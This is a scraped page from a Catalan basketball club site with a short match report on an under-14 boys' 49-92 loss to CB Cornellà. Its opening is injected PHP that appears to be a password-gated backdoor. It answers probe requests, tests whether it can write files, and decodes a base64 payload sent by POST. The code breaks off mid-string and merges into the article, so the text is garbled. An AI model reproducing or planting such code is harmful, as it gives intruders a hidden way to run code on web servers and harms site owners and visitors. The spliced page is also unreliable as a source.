function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil masculí A encaixa la primera derrota del curs contra un CB Cornellà superior (49-92) - Tgn Bàsquet Club -

L’infantil masculí A encaixa la primera derrota del curs contra un CB Cornellà superior (49-92)

Updated: octubre 24, 2017

L’infantil masculí A va perdre el seu primer partit de la temporada contra un adversari, el CB Cornellà, que sempre va ser millor. Els locals no van poder imposar mai el seu ritme de joc i van anar a remolc des del començament. Això va ser un llast pel conjunt que entrena Raül Bonet i va acabar passant factura. El parcial dels segons deu minuts va ser clar: 5-26, i la victòria semblava una quimera. Les diferències encara van ser més grans després del descans.